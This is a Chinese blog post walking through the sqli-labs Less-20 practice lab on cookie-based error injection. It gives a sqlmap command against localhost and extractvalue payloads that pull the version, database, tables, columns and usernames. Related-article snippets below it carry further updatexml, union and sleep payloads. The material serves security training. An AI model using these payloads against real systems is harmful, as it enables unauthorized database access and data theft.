sqli-labs20关基于post的cookie报错注入

最新推荐文章于 2023-11-18 17:31:21 发布
最新推荐文章于 2023-11-18 17:31:21 发布
阅读量313 收藏
点赞数
分类专栏: sqli-labs靶场 文章标签: cookie
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46527080/article/details/111391845
版权

知识点

Cookie
Cookie指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据

Cookie,有时候也用复数形式Cookies,这种是指某些网站为了辨别用户身份,简单来说就是当您输入一次网站的用户名和密码之后,下一次就可以不需要输入。

服务器发送到用户浏览器并保存在本地的一小块数据,它会在浏览器下次向同一服务器再发起请求时被携带并发送到服务器上。通常,它用于告知网站服务器两个请求是否来自同一浏览器,如保持用户的登录状态。

$_COOKIE函数 作用:读取cookie信息

第二十关

sqlmap方法
当然这里既然是确定了是Cookie注入类型,那我们就可以使用SQLmap进行自动化注入:

python2 sqlmap.py -u "http://127.0.0.1/sqlilabs/Less-20/" --cookie="PHPSESSID=cbc3a5ec86e968fa6ee74f1839c2097e" –dbs

源码分析
1.读取uname传进来的cookie值
在这里插入图片描述2.uname和password同样被过滤,查询语句还是用and连接
在这里插入图片描述
3.通过uname传参获取cookie的值
存在cookie值那个变量用单引号闭合的
在这里插入图片描述手注
在这里插入图片描述所以传递payload的地方就是cookie传递的地方
注意:抓包的的时候要先转发一下,才能有cookie值
一、判断闭合字符

' and extractvalue(1,concat(0x7e,( 1),0x7e))#

在这里插入图片描述二、构造payload
1.爆版本号

' and extractvalue(1,concat(0x7e,( version()),0x7e))#

在这里插入图片描述2.爆库

' and extractvalue(1,concat(0x7e,( database()),0x7e))#

在这里插入图片描述3.爆表

' and extractvalue(1,concat(0x7e,( select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e))#

在这里插入图片描述4.爆字段

' and extractvalue(1,concat(0x7e,( select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e))#

在这里插入图片描述5.爆数据

' and extractvalue(1,concat(0x7e,( select username from users limit 2,1),0x7e))#

在这里插入图片描述

24team
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Cookie注入自动化检测脚本检测实现
afei001
07-17 240
该脚本是在Cookie注入自动化检测脚本实现的基础上进行检测的。Cookie注入自动化检测脚本请点击。
cookie注入原理详解
weixin_50464560的博客
07-16 6588
那我们还是围绕以下几个问题来看看cookie注入: 1.什么是cookie注入? 2.为什么要cookie注入? 3.怎样cookie注入? 1.什么是cookie注入?   ♦cookie注入的原理是:就要修改cookie的值,   ♦cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数已cookie方式提交了,而一般的注入我们是使用get或者post...
Sql-labs 前 20 通过笔记
weixin_45619494的博客
10-06 427
输入:passwd=admin' and updatexml(1,concat(0x5e,(substr((select database()),1)),0x5e),1) --+直接用 十八 payload:3',extractvalue(1,concat(0x7e,(select database()),0x7e))) #发现 用 passwd=admin' sleep(6) --+ ,没有延迟,时间盲注可能没用。修改 0x5e 之前 的数字 为 32,63,94,125,即可获得后续内容!
Sqli-labs全通教程(手工注入+工具使用sqlmap)
热门推荐
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
sqli-labs-Less-20 cookie注入(全套题目,持续更新)
yzcn
11-21 453
Less-20 cookie注入 **Cookie:**有时也用其复数形式 Cookies。类型为“小型文本文件”,是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息。 先正常登陆: 返回了输入的name和password,并提示使用cookie注入 判断注入点,使用插件Cookie Editor修改cookie,因为第一次登陆成功,cookie的值会在数据库存放,所以我们第一次登陆成功,后面更改cookie的值进行注入
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
安装sqli-labs
10-22
本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地Web靶场 在开始安装sqli...
sqli-labs第二十
m0_73248913的博客
02-16 426
sqlilabs第二十cookie注入
17、cookie注入
weixin_41489908的博客
12-06 231
环境sqli-labs less 20 1、在cookie里输入特殊字符 发现是单引号闭合 2、判断字段长度 order by 3正常,order by 4返回误 3、union联合查询 a’ union select 1,2,3 # 4、获取数据库名称 a’ union select 1,2,database()# 5、获取表名 a’ union select 1,2,group...
cookie 注入
白菜执笔人的博客
03-01 532
Web安全攻防 学习笔记 一、cookie 注入 1.1、HTTP 头中的注入介绍         服务器可以利用 cookies 包含信息的任意性来筛选并经常性维护这些信息,以判断在 HTTP 传 输中的状态。cookies 最经典的应用就是判断用户是否已经登录网站。 1.2、cookie 注入 代码中使用 Cookie 传递参数,但是没有对 Coo...
sqli-labs第二十详解
金 帛的博客
05-07 1889
sql靶场第二十详解,DNSlog注入
sqli-labs卡20(基于http头部盲注)通思路
最新发布
zyh1588的博客
11-18 937
小白回顾sql靶场第二十
(手工)【sqli-labs20】cookie注入:原理、利用过程
07-10 927
【SQL-cookie注入
sqlmap过SQLi-LABS靶场 11-20
小明师傅博客
06-05 3617
第11 后面基本都是post注入了 不过我们用的是神器sqlmap 我们先随便输入,然后bp抓包 把抓到的包保存问txt格式 然后在sqlmap 指定他 用 -r sqlmap.py -r "C:\Users\Administrator\Desktop\post.txt" --leve=5 --sisk=3 --dbs 全部就扫出来啦 第12 一模一样 第13 多了两条,要用空值测试,线程默认10跑这个速度好慢 然后也是一模一样 14 一模一样 15 一模一样 16-20
sqli-labs第11-20
永远相信美好的事情即将发生
12-15 3797
Less-11 进入后是个登录页面,应该是基于post注入,这边准备用hackbar注入,方便一点。看一下源码,两个框的名字分别是uname和passwd 先提交1试试效果 登陆失败,再加一个单引号试试,密码框不输(若是输入密码,出来的信息更少;也可同时输入单双引号,这个效果一样) 有回显,存在注入,且回显的误为:‘1’’ and password=’’ LIMIT 0,1。其中1’是我输进去的,另外还有成对的单引号出现,可以看出是字符型。由此猜测sql语句为:select usernam
sqli-labs 11-20指南(详细解读)
weixin_44576725的博客
11-08 2247
前言:这里的卡多为post注入,故结合burpsuite进行抓包分析 Less-11 1、post注入,先在username输入admin’,password随便输,返回误信息,从误信息可知在username处应该有注入点,且可能为字符注入类型: 抓包: 2、加上万能语句or 1=1#,修改为admin’ or 1=1#,发现登陆成功,而且用户默认为dumb,可确定为字符型注入: 3、order by确定列数,确定为2: 4、开始爆破数据库、表名、列名: 数据库名: 表名: 列名
sqli-labs
10-09
很高兴为您解答sqli-labs的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs,您可以按照以下步骤进行: 1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值